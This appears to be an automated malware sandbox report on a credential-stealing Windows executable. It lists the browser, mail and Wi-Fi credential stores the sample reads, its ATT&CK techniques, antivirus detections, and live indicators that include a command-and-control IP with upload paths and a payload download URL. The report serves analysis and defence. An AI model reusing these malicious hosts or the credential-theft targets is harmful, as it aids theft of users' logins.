    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

    Remote Access Functionality

    Source: Yara match File source: Process Memory Space: iGxCM2I5u9.exe PID: 7544, type: MEMORYSTR
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 331 Windows Management Instrumentation | 1 DLL Side-Loading | 12 Process Injection | 11 Disable or Modify Tools | 1 OS Credential Dumping | 421 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 351 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 12 Process Injection | Security Account Manager | 351 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 2 Data from Local System | 3 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | 4 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 144 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    Behavior Graph ID: 1569093; Sample: iGxCM2I5u9.exe; Startdate: 05/12/2024; Architecture: WINDOWS; Score: 100
    Start node: DNS/IP: orange-loris-425181.hostingersite.com; icanhazip.com; 2 other IPs or domains. Signatures: Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; Sigma detected: Capture Wi-Fi password; 4 other signatures. Started: iGxCM2I5u9.exe (14 7)
    iGxCM2I5u9.exe: DNS/IP: 89.23.100.233, 32089, 49758, 49759 MAXITEL-ASRU Russian Federation; free.cdn.hstgr.net 84.32.84.100, 443, 49756 NTT-LT-ASLT Lithuania; icanhazip.com 104.16.185.241, 49757, 80 CLOUDFLARENETUS United States. Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 5 other signatures. Started: cmd.exe (1)
    cmd.exe: Signatures: Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords. Started: netsh.exe (2); conhost.exe; findstr.exe (1); chcp.com (1)

    Source | Detection | Scanner | Label | Link
    iGxCM2I5u9.exe | 100% | Avira | TR/Spy.Agent.ksybx
    iGxCM2I5u9.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
    iGxCM2I5u9.exe | 100% | Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    https://ocsp.quovadisoffshore.com0 | 0% | Avira URL Cloud | safe
    http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
    https://orange-loris-425181.hostingersite.com | 0% | Avira URL Cloud | safe
    https://orange-loris-425181.hostingersite.com/uploads/clean.exe | 100% | Avira URL Cloud | malware
    http://www.quovadis.bm0 | 0% | Avira URL Cloud | safe
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    free.cdn.hstgr.net | 84.32.84.100 | true | false | | high
    icanhazip.com | 104.16.185.241 | true | false | | high
    orange-loris-425181.hostingersite.com | unknown | unknown | false | | unknown
    69.170.12.0.in-addr.arpa | unknown | unknown | false | | unknown
    Name | Malicious | Antivirus Detection | Reputation
    http://icanhazip.com/ | false | | high
    https://orange-loris-425181.hostingersite.com/uploads/clean.exe | false | Avira URL Cloud: malware | unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabiGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchiGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://duckduckgo.com/ac/?q=iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoiGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssiGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED89000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://orange-loris-425181.hostingersite.comiGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED31000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://t.me/FleshStealeriGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://crl.rootca1.amazontrust.com/rootca1.crl0iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.pki.goog/gtsr1/gtsr1.crl0WiGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://ocsp.rootca1.amazontrust.com0:iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://pki.goog/repository/0iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.ecosia.org/newtab/iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://icanhazip.com/piGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://pki.goog/repo/certs/gtsr1.der04iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ac.ecosia.org/autocomplete?q=iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.comiGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F283000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F232000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.google.com/images/branding/product/ico/googleg_alldp.icoiGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.c.lencr.org/0iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.i.lencr.org/0iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.tmp7AB1.tmp.dat.0.drfalse
                                                        high
                                                        http://www.quovadis.bm0iGxCM2I5u9.exe, 00000000.00000002.103292458865.000001605CFC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://icanhazip.comiGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.mozilla.orgtmp7AB1.tmp.dat.0.drfalse
                                                            high
                                                            https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firetmp7AB1.tmp.dat.0.drfalse
                                                              high
                                                              https://ocsp.quovadisoffshore.com0iGxCM2I5u9.exe, 00000000.00000002.103292458865.000001605CFC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameiGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://gemini.google.com/app?q=iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                     IP | Domain | Country | ASN | ASN Name | Malicious
                                                                     89.23.100.233 | unknown | Russian Federation | 48687 | MAXITEL-ASRU | true
                                                                     104.16.185.241 | icanhazip.com | United States | 13335 | CLOUDFLARENETUS | false
                                                                     84.32.84.100 | free.cdn.hstgr.net | Lithuania | 33922 | NTT-LT-ASLT | false
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1569093
                                                                    Start date and time:2024-12-05 13:08:52 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 6m 51s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                     Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                                                    Run name:Suspected VM Detection
                                                                     Number of new started processes analysed:7
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Sample name:iGxCM2I5u9.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@10/2@3/3
                                                                    EGA Information:Failed
                                                                    HCA Information:Failed
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                                                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                    • Execution Graph export aborted for target iGxCM2I5u9.exe, PID 7544 because it is empty
                                                                     • Not all processes were analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    • VT rate limit hit for: iGxCM2I5u9.exe
                                                                     Time | Type | Description
                                                                     07:11:09 | API Interceptor | 4758383x Sleep call for process: iGxCM2I5u9.exe modified
                                                                     Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                     89.23.100.233 | T05Dk6G8fg.exe | malicious | Unknown | 89.23.100.233:1488/upload
                                                                     89.23.100.233 | 3K5MXGVOJE.exe | malicious | Unknown | 89.23.100.233:1489/upload
                                                                     89.23.100.233 | VaXmr82RIb.exe | malicious | Unknown | 89.23.100.233:1488/upload
                                                                     104.16.185.241 | 3K5MXGVOJE.exe | malicious | Unknown | icanhazip.com/
                                                                     104.16.185.241 | K6aOw2Jmji.exe | malicious | Stealerium | icanhazip.com/
                                                                     104.16.185.241 | jpiWvvEcbp.exe | malicious | Stealerium | icanhazip.com/
                                                                     104.16.185.241 | VzhY4BcvBH.exe | malicious | AsyncRAT, RedLine, StormKitty, VenomRAT | icanhazip.com/
                                                                     104.16.185.241 | L814CyOxMT.exe | malicious | Flesh Stealer, PureLog Stealer, zgRAT | icanhazip.com/
                                                                     104.16.185.241 | GsZkXAmf61.exe | malicious | Celestial Rat, EICAR | icanhazip.com/
                                                                     104.16.185.241 | REQUEST FOR QUOTATION.js | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | icanhazip.com/
                                                                     104.16.185.241 | Company profile.js | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | icanhazip.com/
                                                                     104.16.185.241 | RFQ.vbs | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | icanhazip.com/
                                                                     104.16.185.241 | HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbs | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | icanhazip.com/
                                                                     Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                     free.cdn.hstgr.net | FmmYUD4pt7.wsf | malicious | Unknown | 84.32.84.136
                                                                     free.cdn.hstgr.net | https://ohpky5.fj78.fdske.com/e/c/01jbx9w45rt8n7dv9hga5bx34b/01jbx9w45rt8n7dv9hgd1yw31d | malicious | Unknown | 84.32.84.121
                                                                     free.cdn.hstgr.net | http://zip.lu/?redirect=3k7wI | malicious | Unknown | 84.32.84.104
                                                                     free.cdn.hstgr.net | https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/ | malicious | Unknown | 84.32.84.197
                                                                     free.cdn.hstgr.net | http://zip.lu/?redirect=3k7wI | malicious | Unknown | 84.32.84.227
                                                                     free.cdn.hstgr.net | https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/ | malicious | Unknown | 93.127.179.137
                                                                     free.cdn.hstgr.net | e0OOofAl0S.exe | malicious | CryptOne, SmokeLoader, Stealc | 191.96.144.157
                                                                     free.cdn.hstgr.net | oZB7n3wuNk.exe | malicious | CryptOne, SmokeLoader, Stealc | 84.32.84.152
                                                                     free.cdn.hstgr.net | mLn7GEEpuS.exe | malicious | CryptOne, SmokeLoader, Stealc | 185.77.97.68
                                                                     icanhazip.com | T05Dk6G8fg.exe | malicious | Unknown | 104.16.184.241
                                                                     icanhazip.com | 3K5MXGVOJE.exe | malicious | Unknown | 104.16.185.241
                                                                     icanhazip.com | VaXmr82RIb.exe | malicious | Unknown | 104.16.184.241
                                                                     icanhazip.com | Pdf Reader.exe | malicious | Stealerium | 104.16.184.241
                                                                     icanhazip.com | gKWbina3a4.bat | malicious | Stealerium | 104.16.184.241
                                                                     icanhazip.com | K6aOw2Jmji.exe | malicious | Stealerium | 104.16.185.241
                                                                     icanhazip.com | uyz4YPUyc9.exe | malicious | Stealerium | 104.16.184.241
                                                                     icanhazip.com | yv7QsAR49V.exe | malicious | Stealerium | 104.16.184.241
                                                                     icanhazip.com | jpiWvvEcbp.exe | malicious | Stealerium | 104.16.185.241
                                                                     icanhazip.com | 5E3zWXveDN.exe | malicious | Stealerium | 104.16.184.241
                                                                     Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                     CLOUDFLARENETUS | https://forms.zohopublic.com/volt1g1/form/CompleteVehicleAccessoriesLtd/formperma/DjGG5qUda3jrtGBWWHgY7RiBMK57TQ9IEa34k6QF6G0 | malicious | HTMLPhisher | 104.18.95.41
                                                                     CLOUDFLARENETUS | z21nfe_20231205_001.vbs | malicious | Unknown | 104.21.93.68
                                                                     CLOUDFLARENETUS | 7Gt3icFvQW.exe | malicious | AgentTesla | 104.26.12.205
                                                                     CLOUDFLARENETUS | 1AxSwjpyGp.exe | malicious | AgentTesla, DarkTortilla | 104.26.12.205
                                                                     CLOUDFLARENETUS | V5P3YggUcy.exe | malicious | LummaC Stealer | 172.67.181.192
                                                                     CLOUDFLARENETUS | FPBKcOFjEP.exe | malicious | AgentTesla, DarkTortilla | 104.26.12.205
                                                                     CLOUDFLARENETUS | V5P3YggUcy.exe | malicious | LummaC Stealer | 172.67.181.192
                                                                     CLOUDFLARENETUS | https://t.ly/HThl-Link1-0312 | malicious | Unknown | 104.20.7.133
                                                                     CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.16.9
                                                                     CLOUDFLARENETUS | LiteDBViewer.exe | malicious | LummaC Stealer | 172.67.181.192
                                                                     MAXITEL-ASRU | T05Dk6G8fg.exe | malicious | Unknown | 89.23.100.233
                                                                     MAXITEL-ASRU | 3K5MXGVOJE.exe | malicious | Unknown | 89.23.100.233
                                                                     MAXITEL-ASRU | VaXmr82RIb.exe | malicious | Unknown | 89.23.100.233
                                                                     MAXITEL-ASRU | Installer_setup32_64x.exe | malicious | LummaC, Stealc | 89.23.96.109
                                                                     MAXITEL-ASRU | 9fGsCDYKLV.exe | malicious | Flesh Stealer | 89.23.100.233
                                                                     MAXITEL-ASRU | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 89.23.100.233
                                                                     MAXITEL-ASRU | file.exe | malicious | Flesh Stealer | 89.23.100.233
                                                                     MAXITEL-ASRU | L814CyOxMT.exe | malicious | Flesh Stealer, PureLog Stealer, zgRAT | 89.23.100.233
                                                                     MAXITEL-ASRU | vbe11TPn2x.exe | malicious | Flesh Stealer | 89.23.100.233
                                                                     MAXITEL-ASRU | Ham9SAD0Ou.doc | malicious | Unknown | 89.23.98.98
                                                                     NTT-LT-ASLT | SRT68.exe | malicious | FormBook | 84.32.84.32
                                                                     NTT-LT-ASLT | http://editableslides.co | malicious | HTMLPhisher, TechSupportScam | 84.32.84.208
                                                                     NTT-LT-ASLT | Pp7OXMFwqhXKx5Y.exe | malicious | FormBook | 84.32.84.32
                                                                     NTT-LT-ASLT | SW_5724.exe | malicious | FormBook | 84.32.84.32
                                                                     NTT-LT-ASLT | attached invoice.exe | malicious | FormBook | 84.32.84.32
